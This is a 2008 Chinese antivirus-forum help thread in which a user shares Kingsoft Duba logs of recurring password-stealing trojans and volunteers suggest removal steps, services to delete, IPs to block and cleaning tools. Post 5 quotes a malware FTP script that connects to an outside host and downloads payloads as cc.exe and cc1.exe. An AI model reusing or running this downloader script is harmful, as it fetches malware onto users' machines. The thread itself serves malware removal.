信息 2008-09-25 00:33:18 KAVIPC开始运行   
信息 2008-09-25 00:33:18 KAVIPC初始化成功   
信息 2008-09-25 00:33:18 KAVIPC开始加载   
信息 2008-09-25 00:33:18 Windows Security Center初始化成功   
信息 2008-09-25 00:33:18 Restore-Module初始化成功   
信息 2008-09-25 00:33:18 Windows Logon Splash初始化成功   
信息 2008-09-25 00:33:18 金山毒霸文件实时防毒开始加载   
病毒 2008-09-23 19:00:57 病毒在文件C:\alhdpw.exe中 Win32.Troj.XSey.a.401408 处理成功(操作:删除)
病毒 2008-09-23 18:41:50 病毒在文件C:\zdmumrv.exe中 Win32.Troj.XSey.a.405504 处理成功(操作:删除)
信息 2008-09-23 15:45:09 金山毒霸文件实时防毒被通知重启   
病毒 2008-09-23 14:57:48 病毒在文件C:\yxloibmd.exe中 Win32.Troj.XSey.a.405504 处理成功(操作:删除)
信息 2008-09-23 13:17:14 KWatch3.SYS开始运行   
信息 2008-09-23 13:17:14 KAEngine初始化成功   
信息 2008-09-23 13:16:48 KWatch3.SYS初始化成功   
信息 2008-09-23 13:16:48 KWatch3.SYS开始加载   
信息 2008-09-23 13:16:48 KAVIPC开始运行   
信息 2008-09-23 13:16:48 KAVIPC初始化成功   
信息 2008-09-23 13:16:48 KAVIPC开始加载   
信息 2008-09-23 13:16:48 Windows Security Center初始化成功   
信息 2008-09-23 13:16:48 Restore-Module初始化成功   
信息 2008-09-23 13:16:48 Windows Logon Splash初始化成功   
信息 2008-09-23 13:16:48 金山毒霸文件实时防毒开始加载   
信息 2008-09-23 00:12:22 金山毒霸文件实时防毒被通知重启   
信息 2008-09-23 00:11:26 KWatch3.SYS开始运行   
信息 2008-09-23 00:11:26 KAEngine初始化成功   
信息 2008-09-23 00:10:51 KWatch3.SYS初始化成功   
信息 2008-09-23 00:10:51 KWatch3.SYS开始加载   
信息 2008-09-23 00:10:51 KAVIPC开始运行   
信息 2008-09-23 00:10:51 KAVIPC初始化成功   
信息 2008-09-23 00:10:51 KAVIPC开始加载   
信息 2008-09-23 00:10:51 Windows Security Center初始化成功   
信息 2008-09-23 00:10:51 Restore-Module初始化成功   
信息 2008-09-23 00:10:51 Windows Logon Splash初始化成功   
信息 2008-09-23 00:10:51 金山毒霸文件实时防毒开始加载   
病毒 2008-09-22 17:59:29 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\E2MB6QEY\CA2JINED.jpg中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
病毒 2008-09-22 17:58:48 病毒在文件C:\Documents and Settings\Administrator\桌面\cc.exe中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
病毒 2008-09-22 17:19:03 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\R33HM1D0\CA1GK3TT.jpg中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
病毒 2008-09-22 16:39:10 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\E2MB6QEY\CAKDAZ8D.jpg中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
病毒 2008-09-22 15:59:43 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\R33HM1D0\gx[1].jpg中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
信息 2008-09-22 15:29:12 KWatch3.SYS已经恢复运行   
信息 2008-09-22 15:24:00 KWatch3.SYS进入暂停状态   
病毒 2008-09-22 15:20:10 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\E2MB6QEY\CAI7AR65.jpg中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
病毒 2008-09-22 14:39:57 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\E2MB6QEY\gx[1].jpg中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
信息 2008-09-22 13:57:47 KWatch3.SYS开始运行   
信息 2008-09-22 13:57:47 KAEngine初始化成功   
信息 2008-09-22 13:57:42 KWatch3.SYS初始化成功   
信息 2008-09-22 13:57:42 KWatch3.SYS开始加载   
信息 2008-09-22 13:57:42 KAVIPC开始运行   
信息 2008-09-22 13:57:42 KAVIPC初始化成功   
信息 2008-09-22 13:57:42 KAVIPC开始加载   
信息 2008-09-22 13:57:42 Windows Security Center初始化成功   
信息 2008-09-22 13:57:42 Restore-Module初始化成功   
信息 2008-09-22 13:57:42 Windows Logon Splash初始化成功   
信息 2008-09-22 13:57:42 金山毒霸文件实时防毒开始加载   
病毒 2008-09-22 13:19:26 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\NS10RXJH\gx[1].jpg中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
病毒 2008-09-22 13:18:12 病毒在文件C:\WINDOWS\system32\cc.exe中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
信息 2008-09-22 12:46:45 KWatch3.SYS开始运行   
信息 2008-09-22 12:46:45 KAEngine初始化成功   
信息 2008-09-22 12:46:30 KWatch3.SYS初始化成功   
信息 2008-09-22 12:46:30 KWatch3.SYS开始加载   
信息 2008-09-22 12:46:30 KAVIPC开始运行   
信息 2008-09-22 12:46:30 KAVIPC初始化成功   
信息 2008-09-22 12:46:30 KAVIPC开始加载   
信息 2008-09-22 12:46:30 Windows Security Center初始化成功   
信息 2008-09-22 12:46:30 Restore-Module初始化成功   
信息 2008-09-22 12:46:30 Windows Logon Splash初始化成功   
信息 2008-09-22 12:46:30 金山毒霸文件实时防毒开始加载   
信息 2008-09-22 12:29:27 KWatch3.SYS开始运行   
信息 2008-09-22 12:29:27 KAEngine初始化成功   
信息 2008-09-22 12:29:09 KWatch3.SYS初始化成功   
信息 2008-09-22 12:29:09 KWatch3.SYS开始加载   
信息 2008-09-22 12:29:09 KAVIPC开始运行   
信息 2008-09-22 12:29:09 KAVIPC初始化成功   
信息 2008-09-22 12:29:09 KAVIPC开始加载   
信息 2008-09-22 12:29:09 Windows Security Center初始化成功   
信息 2008-09-22 12:29:09 Restore-Module初始化成功   
信息 2008-09-22 12:29:09 Windows Logon Splash初始化成功   
信息 2008-09-22 12:29:09 金山毒霸文件实时防毒开始加载   
信息 2008-09-22 12:17:27 KWatch3.SYS开始运行   
信息 2008-09-22 12:17:27 KAEngine初始化成功   
信息 2008-09-22 12:17:14 KWatch3.SYS初始化成功   
信息 2008-09-22 12:17:14 KWatch3.SYS开始加载   
信息 2008-09-22 12:17:14 KAVIPC开始运行   
信息 2008-09-22 12:17:14 KAVIPC初始化成功   
信息 2008-09-22 12:17:14 KAVIPC开始加载   
信息 2008-09-22 12:17:14 Windows Security Center初始化成功   
信息 2008-09-22 12:17:14 Restore-Module初始化成功   
信息 2008-09-22 12:17:14 Windows Logon Splash初始化成功   
信息 2008-09-22 12:17:14 金山毒霸文件实时防毒开始加载   
信息 2008-09-22 12:15:59 金山毒霸文件实时防毒被通知重启   
病毒 2008-09-22 12:14:04 病毒在文件C:\WINDOWS\system32\drivers\kfoemg.sys中 Win32.Hack.HookFile.a.32768 处理成功(操作:删除)
病毒 2008-09-22 12:14:04 病毒在文件C:\WINDOWS\system32\drivers\qhqbr.sys中 Win32.Troj.Agent.48128 处理成功(操作:删除)
信息 2008-09-22 12:13:26 KWatch3.SYS开始运行   
信息 2008-09-22 12:13:26 KAEngine初始化成功   
信息 2008-09-22 12:13:10 KWatch3.SYS初始化成功   
信息 2008-09-22 12:13:10 KWatch3.SYS开始加载   
信息 2008-09-22 12:13:10 KAVIPC开始运行   
信息 2008-09-22 12:13:10 KAVIPC初始化成功   
信息 2008-09-22 12:13:10 KAVIPC开始加载   
信息 2008-09-22 12:13:10 Windows Security Center初始化成功   
信息 2008-09-22 12:13:10 Restore-Module初始化成功   
信息 2008-09-22 12:13:10 Windows Logon Splash初始化成功   
信息 2008-09-22 12:13:10 金山毒霸文件实时防毒开始加载   
信息 2008-09-22 12:07:29 KWatch3.SYS开始运行   
信息 2008-09-22 12:07:29 KAEngine初始化成功   
信息 2008-09-22 12:07:28 KWatch3.SYS初始化成功   
信息 2008-09-22 12:07:28 KWatch3.SYS开始加载   
信息 2008-09-22 12:07:28 KAVIPC开始运行   
信息 2008-09-22 12:07:28 KAVIPC初始化成功   
信息 2008-09-22 12:07:28 KAVIPC开始加载   
信息 2008-09-22 12:07:28 Windows Security Center初始化成功   
信息 2008-09-22 12:07:28 Restore-Module初始化成功   
信息 2008-09-22 12:07:28 Windows Logon Splash初始化成功   
信息 2008-09-22 12:07:28 金山毒霸文件实时防毒开始加载

搜索更多相关主题的帖子: ftpPOPO 求助

TOP

dayday315

新兵

积分
44 
威望
92  
元宝
0  
铜钱
66  
2楼 发表于 2008-10-1 03:58  只看该作者
病毒        2008-09-28  16:01:38        C:\windows\system32\psqwmbw.dll        Win32.Troj.XSeyT.vb.454656        清除成功       
这是手动最近杀出来的

TOP

网络爱好者

列兵

积分
79 
威望
179  
元宝
0  
铜钱
102  
3楼 发表于 2008-10-1 04:12  只看该作者
建议使用SREng扫描日志作为附件上传,以便于解答~  
下载页面:http://www.kztechs.com/sreng/download.html
操作方法:
1、下载后解压缩,运行SREngPS.EXE;
2、依次点击【智能扫描】-【扫描】(记得勾选数字签名),耐心等待,扫描结束后点击【保存报告】;
3、选择保存路径,文件名保持默认,直接点击【保存】;
4、将日志文件SREngLOG.log作为附件上传
这个比较好  呵呵
本帖最近评分记录
  • vistalong 威望 +5 欢迎常来 2008-10-4 15:23
  • cchao21 威望 +10 欢迎常来坐坐。 2008-10-1 21:56

TOP

lg560852

新兵

积分
威望
20  
元宝
0  
铜钱
3  
4楼 发表于 2008-10-1 09:07  只看该作者
尝试关闭135端口(注意,此举会使得你的内网共享服务无法使用)
创建同名文件夹抑制病毒文件生成
禁掉这2个IP
59.34.197.188  21
203.208.37.104  80
请将检测到的样本发至我的邮箱lg560852@163.com,RAR打包加密码123,谢谢合作!
本帖最近评分记录
  • vistalong 威望 +5 欢迎常来 2008-10-4 15:23
  • cchao21 威望 +10 欢迎常来坐坐。 2008-10-1 21:56

TOP

dayday315

新兵

积分
44 
威望
92  
元宝
0  
铜钱
66  
5楼 发表于 2008-10-1 13:18  只看该作者
我在c\windows\help  里面发现了bai.BAT  help.dll    help.dll   用文本的方式打开里面的内容是
OPEN www.taolu163.cn
and2
get crr.ini cc.exe
get crt.ini cc1.exe
bye

TOP

dayday315

新兵

积分
44 
威望
92  
元宝
0  
铜钱
66  
6楼 发表于 2008-10-1 13:23  只看该作者

这是日志

这些是扫的日志,关键是我重新全部格式化做了系统这毒都还在,让我感觉他很牛B

附件

SREngLOG.log (27.02 KB)

2008-10-1 13:23, 下载次数: 113

SRE

抢杀日志.txt (3.73 KB)

2008-10-1 13:23, 下载次数: 109

抢杀

实时防毒日志.txt (51.76 KB)

2008-10-1 13:23, 下载次数: 64

实时

手动杀毒日志.txt (25.75 KB)

2008-10-1 13:23, 下载次数: 63

手动

TOP

小小天

一级士官

积分
238 
威望
513  
元宝
0  
铜钱
335  
7楼 发表于 2008-10-1 13:45  只看该作者
启动项目 -- 服务 -- Win32服务应用程序之如下项禁用:
[Wxsynas / Wxsynas]    <>

TOP

dayday315

新兵

积分
44 
威望
92  
元宝
0  
铜钱
66  
8楼 发表于 2008-10-1 21:43  只看该作者
不好意思啊  我对电脑不是很懂,能否详细的告诉一下怎么禁用,谢谢了啊

TOP

dayday315

新兵

积分
44 
威望
92  
元宝
0  
铜钱
66  
9楼 发表于 2008-10-2 23:03  只看该作者
没人能解决下  ftpPOPO   这个木马吗   在C盘里发现 cc.exe    cc1.exe

TOP

小小天

一级士官

积分
238 
威望
513  
元宝
0  
铜钱
335  
10楼 发表于 2008-10-3 00:24  只看该作者
大部份都是在临时文件夹下发现的。

清除IE的临时文件:打开IE 点工具-->Internet选项 : Internet临时文件,点“删除文件”按钮 ,将 删除所有脱机内容 打勾,点确定删除。

TOP

dayday315

新兵

积分
44 
威望
92  
元宝
0  
铜钱
66  
11楼 发表于 2008-10-3 00:29  只看该作者
无用,安全模式下删除IE的临时文件  运行%temp%    里的所有文件都删除了不知道多少遍了还是会出现

TOP

dayday315

新兵

积分
44 
威望
92  
元宝
0  
铜钱
66  
12楼 发表于 2008-10-4 13:21  只看该作者
有没有高手能解决下啊

TOP

xiaopeng018

四级士官

积分
1272 
威望
2745  
元宝
0  
铜钱
1797  
13楼 发表于 2008-10-4 15:24  只看该作者
http://bbs.duba.net/thread-21980694-1-1.html
你看下吧 希望对你有用

TOP

vistalong

爱毒霸社区缉毒队

积分
4204 
威望
8923  
元宝
10  
铜钱
5603  

安全精英 安全之星勋章 周刊评论员

14楼 发表于 2008-10-4 15:32  只看该作者
使用SREng修复下面各项:
    启动项目 -- 服务 -- Win32服务应用程序之如下项禁用:
[Wxsynas / Wxsynas]    <>
     系统修复---文件关联---修复
关闭IE用下面的工具全选,清理系统临时文件和IE临时文件夹   
http://www.xpi386.com.cn/tools/HA-ATF-Cleaner.rar
下载windows清理助手V2.7  注意:升级以后再使用
http://www.arswp.com/download/arswp2/arswp2.zip

1、描述症状、杀软对病毒处理结果,提供病毒文件名和路径。
2、提供清理专家报告或者sreng报告。
3、可疑程序用压缩包 形式上报病毒样本上报区
http://bbs.duba.net/forum-3252-1.html

TOP

wmd123

上尉

积分
3675 
威望
6118  
元宝
0  
铜钱
498  
15楼 发表于 2008-10-4 17:01  只看该作者
命令行下运行:sc delete Wxsynas
你那个屏保很特别,internet上找不到,建议暂时先停用一下
hijackthis扫log[url]http://bbs.kingsoft.com/viewthread.php?tid=326358&fpage=1[/url] 操作[url]http://www.xici.net/main.asp?doc=41593440[/url] 趋势在线杀毒:(xp带网络连接的安全模式进入) [url]http://www.hcny.gov.cn/netres/netres.htm[/url] 趋势小工具[url]ftp://ftp.trendmicro.com.cn/support/public[/url] 一般问题的解决[url]http://www.hongsanhuan.com.cn/bbsnew/showtopic.asp?TOPIC_ID=159&Forum_ID=7[/url]

TOP

dayday315

新兵

积分
44 
威望
92  
元宝
0  
铜钱
66  
16楼 发表于 2008-10-5 02:05  只看该作者
我很纳闷的是我全部格式化重新分区做的系统那病毒都还在.........现在已经将vbs的禁用了

TOP

wmd123

上尉

积分
3675 
威望
6118  
元宝
0  
铜钱
498  
17楼 发表于 2008-10-5 21:29  只看该作者
你那个屏保很特别,internet上找不到,建议暂时先停用一下
你装完系统会出现病毒吗?如果是,那就是安装盘的问题;如果不是,是否一上网就出问题了;如果是,你否是局域网,如果是装个arp防火墙。
hijackthis扫log[url]http://bbs.kingsoft.com/viewthread.php?tid=326358&fpage=1[/url] 操作[url]http://www.xici.net/main.asp?doc=41593440[/url] 趋势在线杀毒:(xp带网络连接的安全模式进入) [url]http://www.hcny.gov.cn/netres/netres.htm[/url] 趋势小工具[url]ftp://ftp.trendmicro.com.cn/support/public[/url] 一般问题的解决[url]http://www.hongsanhuan.com.cn/bbsnew/showtopic.asp?TOPIC_ID=159&Forum_ID=7[/url]

TOP

dayday315

新兵

积分
44 
威望
92  
元宝
0  
铜钱
66  
18楼 发表于 2008-10-6 02:04  只看该作者
装完系统还是有,系统盘用了3年了,以前都没有出现过,近1个月才出现的这个毒,一上网就出病毒,不是局域网,装了金山的ARP防火墙的

TOP

月下桂花

叫丁香的鱼


爱毒霸社区缉毒队

积分
2127 
威望
4630  
元宝
14  
铜钱
1789  

安全之星勋章 周刊评论员

19楼 发表于 2008-10-6 10:00  只看该作者
我家有月亮.............
月下桂花
             月下桂花的网盘
            动物家园安全咨询中心

TOP

yewenq

新兵

积分
威望
3  
元宝
0  
铜钱
2  
20楼 发表于 2008-10-17 10:46  只看该作者
把你的ftp.exe删了,

TOP

‹‹ 上一主题 | 下一主题 ››
 24 12
发新话题